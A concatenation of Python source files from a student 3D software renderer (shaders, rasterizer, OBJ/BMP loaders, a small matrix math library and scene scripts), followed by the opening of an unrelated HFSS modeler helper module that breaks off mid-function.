intensity = 0
b*= intensity
g*= intensity
r*= intensity
camForward = [render.camMatrix[0][2],
render.camMatrix[1][2],
render.camMatrix[2][2]]
glowAmount = 1 - mate.productoPunto(normal, camForward)
glowColor = [1,1,0]
r += glowColor[0] * glowAmount
g += glowColor[1] * glowAmount
b += glowColor[2] * glowAmount
if r > 1: r=1
if g > 1: g=1
if b > 1: b=1
return r, g, b
def shader4(render, **kwargs):
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
if intensity > 0.95:
b*= 0/255
g*= 255/255
r*= 255/255
elif intensity > 0.94:
b*= 1/255
g*= 254/255
r*= 255/255
elif intensity > 0.93:
b*= 2/255
g*= 253/255
r*= 255/255
elif intensity > 0.92:
b*= 3/255
g*= 252/255
r*= 255/255
elif intensity > 0.91:
b*= 4/255
g*= 251/255
r*= 255/255
elif intensity > 0.9:
b*= 5/255
g*= 250/255
r*= 255/255
elif intensity > 0.85:
b*= 10/255
g*= 245/255
r*= 255/255
elif intensity > 0.8:
b*= 20/255
g*= 235/255
r*= 255/255
elif intensity > 0.65:
b*= 25/255
g*= 180/255
r*= 255/255
elif intensity > 0.5:
b*= 20/255
g*= 140/255
r*= 255/255
elif intensity > 0.4:
b*= 15/255
g*= 100/255
r*= 255/255
elif intensity > 0.3:
b*= 10/255
g*= 80/255
r*= 255/255
elif intensity > 0.25:
b*= 9/255
g*= 70/255
r*= 255/255
elif intensity > 0.2:
b*= 8/255
g*= 60/255
r*= 255/255
elif intensity > 0.15:
b*= 7/255
g*= 30/255
r*= 255/255
elif intensity > 0.1:
b*= 6/255
g*= 20/255
r*= 255/255
else:
b*= 3/255
g*= 10/255
r*= 255/255
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def koopa(render, **kwargs):
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
if intensity > 1:
intensity = 1
if intensity > 0.95:
r*= 183/255
g*= 129/255
b*= 6/255
elif intensity > 0.94:
r*= 180/255
g*= 125/255
b*= 6/255
elif intensity > 0.93:
r*= 175/255
g*= 120/255
b*= 6/255
elif intensity > 0.92:
r*= 173/255
g*= 118/255
b*= 6/255
elif intensity > 0.91:
r*= 170/255
g*= 115/255
b*= 6/255
elif intensity > 0.9:
r*= 165/255
g*= 110/255
b*= 6/255
elif intensity > 0.85:
r*= 160/255
g*= 105/255
b*= 6/255
elif intensity > 0.8:
r*= 155/255
g*= 100/255
b*= 6/255
elif intensity > 0.65:
r*= 155/255
g*= 10/255
b*= 6/255
elif intensity > 0.5:
r*= 20/255
g*= 140/255
b*= 255/255
elif intensity > 0.4:
r*= 15/255
g*= 100/255
b*= 255/255
elif intensity > 0.3:
r*= 10/255
g*= 80/255
b*= 255/255
elif intensity > 0.25:
r*= 9/255
g*= 70/255
b*= 255/255
elif intensity > 0.2:
r*= 8/255
g*= 60/255
b*= 255/255
else:
r*= 0/255
g*= 91/255
b*= 11/255
# r = 0.7176
# g = 0.5059
# b = 0.03
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
def transparencia(render, **kwargs):
u, v, w = kwargs['baryCoords']
tA, tB, tC = kwargs['texCoords']
b, g, r = kwargs['color']
nA, nB, nC = kwargs['normals']
maxY, minY, y = kwargs['heightY']
b/= 255
g/= 255
r/= 255
if render.active_texture:
tx = tA[0] * u + tB[0] * v + tC[0] * w
ty = tA[1] * u + tB[1] * v + tC[1] * w
texColor = render.active_texture.getColor(tx, ty)
b *= texColor[0] / 255
g *= texColor[1] / 255
r *= texColor[2] / 255
nX = nA[0] * u + nB[0] * v + nC[0] * w
nY = nA[1] * u + nB[1] * v + nC[1] * w
nZ = nA[2] * u + nB[2] * v + nC[2] * w
normal = (nX, nY, nZ)
dirLight = [render.directional_light[0],
render.directional_light[1],
render.directional_light[2]]
intensity = mate.productoPunto(normal, dirLight)
if intensity > 1:
intensity = 1
for x in range(minY, maxY, 2):
if y % 2 != 0:
b = 0
g = 0
r = 0
b*= intensity
g*= intensity
r*= intensity
if intensity > 0:
return r, g, b
else:
return 0,0,0
| {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,709 | campeon19/Engine3D_Graficas | refs/heads/main | /gl.py | # Christian Daniel Perez De Leon 19710
import struct
from collections import namedtuple
from obj import Obj
from numpy import sin, cos, tan
import matematica as mate
V2 = namedtuple('Point2', ['x', 'y'])
V3 = namedtuple('Point3', ['x', 'y', 'z'])
V4 = namedtuple('Point4', ['x', 'y', 'z', 'w'])
def char(c):
return struct.pack('=c', c.encode('ascii'))
def word(w):
return struct.pack('=h', w)
def dword(d):
return struct.pack('=l', d)
def _color(r, g, b):
return bytes([ int(b * 255), int(g * 255), int(r * 255)])
def baryCoords(A, B, C, P):
# u es para A, v es para B, w es para C
try:
#PCB/ABC
u = (((B.y - C.y) * (P.x - C.x) + (C.x - B.x) * (P.y - C.y)) /
((B.y - C.y) * (A.x - C.x) + (C.x - B.x) * (A.y - C.y)))
#PCA/ABC
v = (((C.y - A.y) * (P.x - C.x) + (A.x - C.x) * (P.y - C.y)) /
((B.y - C.y) * (A.x - C.x) + (C.x - B.x) * (A.y - C.y)))
w = 1 - u - v
except:
return -1, -1, -1
return u, v, w
BLACK = _color(0,0,0)
WHITE = _color(1,1,1)
class Renderer(object):
def __init__(self, width, height):
self.curr_color = WHITE
self.clear_color = BLACK
self.glViewMatrix()
self.glCreateWindow(width, height)
self.active_texture = None
self.normal_map = None
self.background = None
self.active_shader = None
self.directional_light = V3(0,0,1)
def glCreateWindow(self, width, height):
self.width = width
self.height = height
self.glClear()
self.glViewport(0,0, width, height)
def glViewport(self, x, y, width, height):
self.vpX = x
self.vpY = y
self.vpWidth = width
self.vpHeight = height
self.viewportMatrix = ([[width/2, 0, 0, x + width/2],
[0, height/2, 0, y + height/2],
[0, 0, 0.5, 0.5],
[0, 0, 0, 1]])
self.glProjectionMatrix()
def glClearColor(self, r, g, b):
self.clear_color = _color(r, g, b)
def glClear(self):
self.pixels = [[ self.clear_color for y in range(self.height)] for x in range(self.width)]
self.zbuffer = [[ float('inf') for y in range(self.height)] for x in range(self.width)]
def glClearBackground(self):
if self.background:
for x in range(self.vpX, self.vpX + self.vpWidth):
for y in range(self.vpY, self.vpY + self.vpHeight):
tx = (x - self.vpX) / self.vpWidth
ty = (y - self.vpY) / self.vpHeight
self.glPoint(x, y, self.background.getColor(tx, ty))
def glViewportClear(self, color = None):
for x in range(self.vpX, self.vpX + self.vpWidth):
for y in range(self.vpY, self.vpY + self.vpHeight):
self.glPoint(x, y, color)
def glColor(self, r, g, b):
self.curr_color = _color(r,g,b)
def glPoint(self, x, y, color = None):
if x < self.vpX or x >= self.vpX + self.vpWidth or y < self.vpY or y >= self.vpY + self.vpHeight:
return
if (0 < x < self.width) and (0 < y < self.height):
self.pixels[int(x)][int(y)] = color or self.curr_color
def glVertex(self, x, y, color = None):
if x < -1 or x > 1:
return
if y < -1 or y > 1:
return
pixelX = (x+1) * (self.vpWidth / 2) + self.vpX
pixelY = (y+1) * (self.vpHeight / 2) + self.vpY
if (0 < x < self.width) and (0 < y < self.height):
self.pixels[int(x)][int(y)] = color or self.curr_color
def glLine(self, v0, v1, color = None):
points = []
x0 = v0.x
x1 = v1.x
y0 = v0.y
y1 = v1.y
if x0 == x1 and y0 == y1:
self.glPoint(x0,y1, color)
return points
dx = abs(x1 - x0)
dy = abs(y1 - y0)
steep = dy > dx
if steep:
x0, y0 = y0, x0
x1, y1 = y1, x1
if x0 > x1:
x0, x1 = x1, x0
y0, y1 = y1, y0
dx = abs(x1 - x0)
dy = abs(y1 - y0)
offset = 0
limit = 0.5
m = dy/dx
y = y0
for x in range(x0, x1 + 1):
if steep:
self.glPoint(y, x, color)
else:
self.glPoint(x, y, color)
offset += m
if offset >= limit:
y += 1 if y0 < y1 else -1
limit += 1
def glLoadModel(self, filename, transalate = V3(0.0,0.0,0.0), scale = V3(1,1,1), rotation = V3(0,0,0)):
model = Obj(filename)
modelMatrix = self.glCreateObjectMatrix(transalate, scale, rotation)
rotationMatrix = self.glCreateRotationMatrix(rotation)
for cara in model.caras:
vertCount = len(cara)
vert0 = model.vertices[cara[0][0] - 1]
vert1 = model.vertices[cara[1][0] - 1]
vert2 = model.vertices[cara[2][0] - 1]
vt0 = model.texturacoordenadas[cara[0][1] - 1]
vt1 = model.texturacoordenadas[cara[1][1] - 1]
vt2 = model.texturacoordenadas[cara[2][1] - 1]
vn0 = self.glDirTransform(model.normales[cara[0][2] - 1], rotationMatrix)
vn1 = self.glDirTransform(model.normales[cara[1][2] - 1], rotationMatrix)
vn2 = self.glDirTransform(model.normales[cara[2][2] - 1], rotationMatrix)
if vertCount == 4:
vn3 = self.glDirTransform(model.normales[cara[3][2] - 1], rotationMatrix)
vert0 = self.glTransform(vert0, modelMatrix)
vert1 = self.glTransform(vert1, modelMatrix)
vert2 = self.glTransform(vert2, modelMatrix)
if vertCount == 4:
vert3 = model.vertices[cara[3][0] - 1]
vt3 = model.texturacoordenadas[cara[3][1] - 1]
vert3 = self.glTransform(vert3, modelMatrix)
a = self.glCamTransform(vert0)
b = self.glCamTransform(vert1)
c = self.glCamTransform(vert2)
if vertCount == 4:
d = self.glCamTransform(vert3)
self.glTriangle_bc(a,b,c, texCoords=(vt0,vt1,vt2), normals = (vn0, vn1, vn2), verts=(vert0, vert1, vert2) )
if vertCount == 4:
self.glTriangle_bc(a,c,d,texCoords=(vt0,vt2,vt3), normals = (vn0, vn2, vn3), verts=(vert0, vert2, vert3))
def glFillTriangle(self, A, B, C, color = None):
if A.y < B.y:
A, B = B, A
if A.y < C.y:
A, C = C, A
if B.y < C.y:
B, C = C, B
def flatBottomTriangle(v1, v2, v3):
try:
d_21 = (v2.x - v1.x) / (v2.y - v1.y)
d_31 = (v3.x - v1.x) / (v3.y - v1.y)
except:
pass
else:
x1 = v2.x
x2 = v3.x
for y in range(v2.y, v1.y + 1):
self.glLine(V2(int(x1),y), V2(int(x2),y), color)
x1 += d_21
x2 += d_31
def flatTopTriangle(v1, v2, v3):
try:
d_31 = (v3.x - v1.x) / (v3.y - v1.y)
d_32 = (v3.x - v2.x) / (v3.y - v2.y)
except:
pass
else:
x1 = v3.x
x2 = v3.x
for y in range(v3.y, v1.y + 1):
self.glLine(V2(int(x1),y), V2(int(x2),y), color)
x1 += d_31
x2 += d_32
if B.y == C.y:
flatBottomTriangle(A, B, C)
elif A.y == B.y:
flatTopTriangle(A, B, C)
else:
D = V2(A.x + ((B.y - A.y) / (C.y - A.y)) * (C.x - A.x) , B.y)
flatBottomTriangle(A, B, D)
flatTopTriangle(B, D, C)
def glTriangle_bc(self, A, B, C, texCoords = (), normals = (), verts = (), color = None):
minX = round(min(A.x, B.x, C.x))
minY = round(min(A.y, B.y, C.y))
maxX = round(max(A.x, B.x, C.x))
maxY = round(max(A.y, B.y, C.y))
for x in range(minX, maxX + 1):
for y in range(minY, maxY + 1):
u,v,w = baryCoords(A,B,C, V2(x,y))
if u >= 0 and v >= 0 and w >= 0:
z = A.z * u + B.z * v + C.z * w
if 0<=x<self.width and 0<=y<self.height:
if z < self.zbuffer[x][y] and z<=1 and z >= -1:
if self.active_shader:
r,g,b = self.active_shader(self, verts = verts , baryCoords = (u,v,w), texCoords = texCoords, normals = normals, color = color or self.curr_color, heightY = (maxY, minY, y))
else:
b,g,r = color or self.curr_color
b/=255
g/=255
r/=255
self.glPoint(x,y, _color(r, g, b))
self.zbuffer[x][y] = z
def glTransform(self, vertex, vMatrix):
augVertex = V4(vertex[0], vertex[1], vertex[2], 1)
transVertex = mate.multMatrices4xVec(vMatrix, augVertex)
transVertex = V3(transVertex[0] / transVertex[3],
transVertex[1] / transVertex[3],
transVertex[2] / transVertex[3])
return transVertex
def glDirTransform(self, dirVector, vMatrix):
augVertex = V4(dirVector[0], dirVector[1], dirVector[2], 0)
transVertex = mate.multMatrices4xVec(vMatrix, augVertex)
transVertex = V3(transVertex[0],
transVertex[1],
transVertex[2])
return transVertex
def glCamTransform( self, vertex ):
augVertex = V4(vertex[0], vertex[1], vertex[2], 1)
res1 = mate.multMatrices4x4(self.viewportMatrix, self.projectionMatrix)
res2 = mate.multMatrices4x4(res1, self.viewMatrix)
transVertex = mate.multMatrices4xVec(res2, augVertex)
transVertex = V3(transVertex[0] / transVertex[3],
transVertex[1] / transVertex[3],
transVertex[2] / transVertex[3])
return transVertex
def glCreateRotationMatrix(self, rotate=V3(0,0,0)):
pitch = mate.gradosARadianes(rotate.x)
yaw = mate.gradosARadianes(rotate.y)
roll = mate.gradosARadianes(rotate.z)
rotationX = [[1,0,0,0],
[0,cos(pitch),-sin(pitch),0],
[0,sin(pitch),cos(pitch),0],
[0,0,0,1]]
rotationY = [[cos(yaw),0,sin(yaw),0],
[0,1,0,0],
[-sin(yaw),0,cos(yaw),0],
[0,0,0,1]]
rotationZ = [[cos(roll),-sin(roll),0,0],
[sin(roll),cos(roll),0,0],
[0,0,1,0],
[0,0,0,1]]
res1 = mate.multMatrices4x4(rotationX, rotationY)
res2 = mate.multMatrices4x4(res1, rotationZ)
return res2
def glCreateObjectMatrix(self, translate = V3(0,0,0), scale=V3(1,1,1), rotate = V3(0,0,0)):
translateMatrix=[[1,0,0, translate.x],
[0,1,0, translate.y],
[0,0,1, translate.z],
[0,0,0,1]]
scaleMatrix=[[scale.x,0,0,0],
[0,scale.y,0,0],
[0,0,scale.z,0],
[0,0,0,1]]
rotationMatrix = self.glCreateRotationMatrix(rotate)
res1 = mate.multMatrices4x4(translateMatrix, rotationMatrix)
res2 = mate.multMatrices4x4(res1, scaleMatrix)
return res2
def glViewMatrix(self, translate = V3(0,0,0), rotate = V3(0,0,0)):
self.camMatrix = self.glCreateObjectMatrix(translate,V3(1,1,1),rotate)
self.viewMatrix = mate.matrizInv(self.camMatrix)
def glLookAt(self, eye, camPosition = V3(0,0,0)):
forward = mate.restaVect(camPosition, eye)
forward = mate.normalizar3D(forward)
right = mate.productoCruz3D(V3(0,1,0), forward)
right = mate.normalizar3D(right)
up = mate.productoCruz3D(forward, right)
up = mate.normalizar3D(up)
camMatrix=([[right[0],up[0],forward[0],camPosition.x],
[right[1],up[1],forward[1],camPosition.y],
[right[2],up[2],forward[2],camPosition.z],
[0,0,0,1]])
self.viewMatrix = mate.matrizInv(camMatrix)
def glProjectionMatrix(self, n = 0.1, f = 1000, fov = 60 ):
t = tan((fov * mate.pi / 180) / 2) * n
r = t * self.vpWidth / self.vpHeight
self.projectionMatrix = ([[n/r, 0, 0, 0],
[0, n/t, 0, 0],
[0, 0, -(f+n)/(f-n), -(2*f*n)/(f-n)],
[0, 0, -1, 0]])
def glDrawPolygon(self, polygon):
for i in range(len(polygon)):
self.glLine(V2(polygon[i][0], polygon[i][1]), V2(polygon[(i+1) % len(polygon)][0], polygon[(i+1) % len(polygon)][1]))
def glScanLine(self):
for y in range (self.height):
puntos = []
puntosfiltrados = []
for x in range (self.width):
if self.pixels[x][y] == self.curr_color:
puntos.append((x,y))
for l in range (0, len(puntos)):
if (puntos[(l+1) % len(puntos)][0] - puntos[l][0]) != 1:
puntosfiltrados.append((puntos[l]))
if len(puntosfiltrados) == 0:
pass
elif len(puntosfiltrados) % 2 == 0:
for x in range(0, len(puntosfiltrados), 2):
self.glLine(V2(puntosfiltrados[x][0], puntosfiltrados[x][1]),V2(puntosfiltrados[(x+1) % len(puntosfiltrados)][0], puntosfiltrados[(x+1) % len(puntosfiltrados)][1]))
elif len(puntosfiltrados) % 3 == 0:
for x in range(0, len(puntosfiltrados), 1):
self.glLine(V2(puntosfiltrados[x][0], puntosfiltrados[x][1]),V2(puntosfiltrados[(x+1) % len(puntosfiltrados)][0], puntosfiltrados[(x+1) % len(puntosfiltrados)][1]))
#print(puntos)
def glFinish(self, filename):
with open(filename, "wb") as file:
# Header
file.write(bytes('B'.encode('ascii')))
file.write(bytes('M'.encode('ascii')))
file.write(dword(14 + 40 + (self.width * self.height * 3)))
file.write(dword(0))
file.write(dword(14 + 40))
# InfoHeader
file.write(dword(40))
file.write(dword(self.width))
file.write(dword(self.height))
file.write(word(1))
file.write(word(24))
file.write(dword(0))
file.write(dword(self.width * self.height * 3))
file.write(dword(0))
file.write(dword(0))
file.write(dword(0))
file.write(dword(0))
# Color Table
for y in range(self.height):
for x in range(self.width):
file.write(self.pixels[x][y])
| {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,710 | campeon19/Engine3D_Graficas | refs/heads/main | /obj.py | # Christian Daniel Perez De Leon 19710
import struct
def _color(r, g, b):
return bytes([ int(b * 255), int(g* 255), int(r* 255)])
class Obj(object):
def __init__(self, filename):
with open(filename, 'r') as file:
self.lines = file.read().splitlines()
self.vertices = []
self.texturacoordenadas = []
self.normales = []
self.caras = []
self.read()
def read(self):
for line in self.lines:
if line:
prefix, value = line.split(' ', 1)
if prefix == 'v':
self.vertices.append(list(map(float, value.split(' '))))
elif prefix == 'vt':
self.texturacoordenadas.append(list(map(float, value.split(' '))))
elif prefix == 'vn':
self.normales.append(list(map(float, value.split(' '))))
elif prefix == 'f':
self.caras.append( [ list(map(int, vert.split('/'))) for vert in value.split(' ')] )
class Texture(object):
def __init__(self, filename):
self.filename = filename
self.read()
def read(self):
with open(self.filename, "rb") as image:
image.seek(10)
headerSize = struct.unpack('=l', image.read(4))[0]
image.seek(14 + 4)
self.width = struct.unpack('=l', image.read(4))[0]
self.height = struct.unpack('=l', image.read(4))[0]
image.seek(headerSize)
self.pixels = []
for y in range(self.height):
self.pixels.append([])
for x in range(self.width):
b = ord(image.read(1)) / 255
g = ord(image.read(1)) / 255
r = ord(image.read(1)) / 255
self.pixels[y].append( _color(r,g,b) )
def getColor(self, tx, ty):
if 0<=tx<1 and 0<=ty<1:
x = int(tx * self.width)
y = int(ty * self.height)
return self.pixels[y][x]
else:
return _color(0,0,0) | {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,711 | campeon19/Engine3D_Graficas | refs/heads/main | /Engine3D.py | # Programa principal
# Christian Daniel Perez De Leon 19710
from gl import Renderer, V2, V3, _color
from obj import Texture
from shaders import *
width = 940
height = 540
rend = Renderer(width, height)
# rend.background = Texture('Fondos/fondo.bmp')
# rend.glClearBackground()
# rend.active_shader = shader1
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(-3,1.3,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = toon
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(0,1.3,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = shader2
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(3,1.3,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = shader3
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(-3,-1.2,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = glow
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(0,-1.2,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
# rend.active_shader = shader4
# rend.active_texture = Texture('Modelos/model.bmp')
# modelPosition = V3(3,-1.2,-5)
# rend.glLoadModel('Modelos/model.obj',
# modelPosition,
# V3(1.2,1.2,1.2),
# V3(0,0,0))
rend.active_shader = transparencia
rend.active_texture = Texture('Modelos/model.bmp')
modelPosition = V3(0,0,-5)
rend.glLoadModel('Modelos/model.obj',
modelPosition,
V3(2.5,2.5,2.5),
V3(0,0,0))
# rend.glLookAt(modelPosition, V3(0,4,2))
# rend.active_shader = phong
# # rend.active_texture = Texture('Modelos/New_Albedo.bmp')
# rend.active_texture = Texture('Modelos/New_AmbientOcclusion.bmp')
# modelPosition = V3(0,0,-4)
# # rend.directional_light = V3(0,0,0)
# rend.glLookAt(modelPosition, V3(0,5,0))
# rend.glLoadModel('Modelos/laptop.obj', modelPosition, V3(7,7,7), V3(20,35,0))
rend.glFinish("Resultados/Pruebas2.bmp") | {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,712 | campeon19/Engine3D_Graficas | refs/heads/main | /matematica.py | # Christian Daniel Perez De Leon 19710
# Libreria de matematica propia
import sys
pi = 3.14159265359
def restaVect(vec1, vec2):
respuesta = []
for x in range(len(vec1)):
res = vec1[x] - vec2[x]
respuesta.append(res)
return respuesta
def productoPunto(vec1, vec2):
respuesta = 0
for x in range(len(vec1)):
res = vec1[x] * vec2[x]
respuesta += res
return respuesta
def productoCruz3D(vec1, vec2):
res = [vec1[1]*vec2[2] - vec1[2]*vec2[1],
vec1[2]*vec2[0] - vec1[0]*vec2[2],
vec1[0]*vec2[1] - vec1[1]*vec2[0]]
return res
def normalizar3D(vector):
magnitud = raizCuadrada(vector[0] * vector[0] + vector[1] * vector[1] + vector[2] * vector[2])
respuesta = [vector[0] / magnitud,
vector[1] / magnitud,
vector[2] / magnitud]
return respuesta
def raizCuadrada(valor):
resultado = valor ** 0.5
return resultado
def gradosARadianes(val):
resultado = val * pi / 180
return resultado
def multMatrices3x3(matriz1, matriz2):
resultado = [[0,0,0],
[0,0,0],
[0,0,0]]
for i in range(len(matriz1)):
for j in range(len(matriz2[0])):
for k in range(len(matriz2)):
resultado[i][j] += matriz1[i][k] * matriz2[k][j]
return resultado
def multMatrices4x4(matriz1, matriz2):
resultado = [[0,0,0,0],
[0,0,0,0],
[0,0,0,0],
[0,0,0,0]]
for i in range(len(matriz1)):
for j in range(len(matriz2[0])):
for k in range(len(matriz2)):
resultado[i][j] += matriz1[i][k] * matriz2[k][j]
return resultado
def multMatrices4xVec(matriz, vector):
resultado = []
for i in range(len(matriz)):
res1 = 0
for j in range(len(matriz[0])):
res1 += matriz[i][j] * vector[j]
resultado.append(res1)
return resultado
def matrizInv(matriz):
n = len(matriz)
m = matriz
# matriz aumentada con la matriz identidad
for i in range(n):
for j in range(n):
if i == j:
m[i].append(1)
else:
m[i].append(0)
# Gauss Jordan Elimination
for i in range(n):
if m[i][i] == 0.0:
sys.exit('Division por cero')
for j in range(n):
if i != j:
ratio = m[j][i]/m[i][i]
for k in range(2*n):
m[j][k] = m[j][k] - ratio * m[i][k]
# Operacion en las filas para convertir la diagonal principal en 1
for i in range(n):
divisor = m[i][i]
for j in range(2*n):
m[i][j] = m[i][j]/divisor
# Guardar matriz
resultado = [[] for _ in range(n)]
for i in range(n):
for j in range(n, 2*n):
resultado[i].append(m[i][j])
return resultado
def valAbsoluto(valor):
if valor < 0:
valor *= -1
return valor
else:
return valor
def scalarxMatrix(scalar, matrix):
m = matrix
for x in range(len(m)):
for y in range(len(m[0])):
m[x][y] = m[x][y] * scalar
return m
def scalarxVector(scalar, vector):
m = vector
for x in range(len(m)):
m[x] = m[x] * scalar
return m
| {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,713 | campeon19/Engine3D_Graficas | refs/heads/main | /Proyecto1.py | # Programa principal
# Christian Daniel Perez De Leon 19710
from gl import Renderer, V2, V3, _color
from obj import Texture
from shaders import *
width = 1920
height = 1080
rend = Renderer(width, height)
rend.background = Texture('Proyecto 1/Modelos/Background/opcion2.bmp')
rend.glClearBackground()
# --------------------------------------------------------------------------
rend.active_shader = transparencia
# rend.active_texture = Texture('Proyecto 1/Modelos/Boo/Boo_tex.bmp')
modelPosition = V3(-4,-2,-5)
rend.glLoadModel('Proyecto 1/Modelos/Boo/Boo.obj',
modelPosition,
V3(0.003,0.003,0.003),
V3(0,160,0))
# --------------------------------------------------------------------------
rend.active_shader = flat
rend.active_texture = Texture('Proyecto 1/Modelos/Toad/Toad_tex.bmp')
modelPosition = V3(-4.5,-2.6,-8)
rend.glLoadModel('Proyecto 1/Modelos/Toad/Toad.obj',
modelPosition,
V3(0.008,0.008,0.008),
V3(0,180,0))
# --------------------------------------------------------------------------
rend.active_shader = phong
rend.active_texture = Texture('Proyecto 1/Modelos/luigiD.bmp')
modelPosition = V3(0,-2.5,-5)
rend.glLoadModel('Proyecto 1/Modelos/luigi.obj',
modelPosition,
V3(0.01,0.01,0.01),
V3(0,120,0))
# --------------------------------------------------------------------------
rend.active_shader = phong
rend.active_texture = Texture('Proyecto 1/Modelos/marioD.bmp')
modelPosition = V3(-2,-2.3,-5)
rend.glLoadModel('Proyecto 1/Modelos/mario.obj',
modelPosition,
V3(0.01,0.01,0.01),
V3(0,-180,0))
# --------------------------------------------------------------------------
rend.active_shader = flat
rend.active_texture = Texture('Proyecto 1/Modelos/Bullet_Bill/Bullet_Bill_tex.bmp')
modelPosition = V3(-2,0,-8)
rend.glLoadModel('Proyecto 1/Modelos/Bullet_Bill/Bullet_Bill.obj',
modelPosition,
V3(0.001,0.001,0.001),
V3(0,50,20))
# --------------------------------------------------------------------------
rend.active_shader = toon
rend.active_texture = Texture('Proyecto 1/Modelos/Extra Life/Extra_Life_tex.bmp')
modelPosition = V3(2.5,-2.5,-7)
rend.glLoadModel('Proyecto 1/Modelos/Extra Life/Extra_Life.obj',
modelPosition,
V3(0.015,0.015,0.015),
V3(0,150,0))
# --------------------------------------------------------------------------
rend.active_shader = phong
rend.active_texture = Texture('Proyecto 1/Modelos/Koopa2/textures/Koopa_tex.bmp')
modelPosition = V3(3.7,-2,-6)
rend.glLoadModel('Proyecto 1/Modelos/Koopa2/source/Koopa.obj',
modelPosition,
V3(0.06,0.06,0.06),
V3(0,90,0))
# --------------------------------------------------------------------------
rend.active_shader = glow
rend.active_texture = None
rend.curr_color = _color(215/255, 151/255, 10/255)
modelPosition = V3(1.5,0.5,-6)
rend.glLoadModel('Proyecto 1/Modelos/Star/Star.obj',
modelPosition,
V3(0.0025,0.0025,0.0025),
V3(0,-40,0))
# --------------------------------------------------------------------------
rend.active_shader = normalMap
rend.active_texture = Texture('Proyecto 1/Modelos/Moon/Textures/Bump_2K.bmp')
rend.normal_map = Texture('Proyecto 1/Modelos/Moon/Textures/normal_map.bmp')
rend.curr_color = _color(1,1,1)
modelPosition = V3(-3.7,2,-6)
rend.glLoadModel('Proyecto 1/Modelos/Moon/Moon_2K.obj',
modelPosition,
V3(0.55,0.55,0.55),
V3(0,90,0))
rend.glFinish("Proyecto 1/Resultado/Proyecto1.bmp")
| {"/Lab1.py": ["/gl.py"], "/shaders.py": ["/matematica.py"], "/gl.py": ["/obj.py", "/matematica.py"], "/Engine3D.py": ["/gl.py", "/obj.py", "/shaders.py"], "/Proyecto1.py": ["/gl.py", "/obj.py", "/shaders.py"]} |
49,732 | judealnas/PyHFSS | refs/heads/master | /hfss3DModeler/hfssModeler.py | from hfss3DModeler import _getModeler
def GetObjName(o3DMod, obj_idx):
"""
:param o3DMod: oDesign.SetActiveEditor("3D Modeler")
:param obj_idx: Object index (i.e. order of creation)
:return: Object name
"""
return o3DMod.GetObjectName(obj_idx)
def GetNumObjects(o3DMod):
"""
:param o3DMod: oDesign.SetActiveEditor("3D Modeler")
:return: Returns number of objects in design
"""
return o3DMod.GetNumObjects()
def GetAllObjNames(o3DMod):
"""
:param o3DMod: oDesign.SetActiveEditor("3D Modeler")
:return: List of names of all objects in target design
"""
return [o3DMod.GetObjectName(i) for i in range(o3DMod.GetNumObjects())]
def Delete(o3DMod, objects):
"""
:param o3DMod: oDesign.SetActiveEditor("3D Modeler")
:param objects: List or comma-separated string of objects to delete
:return: None
"""
obj_str = objects
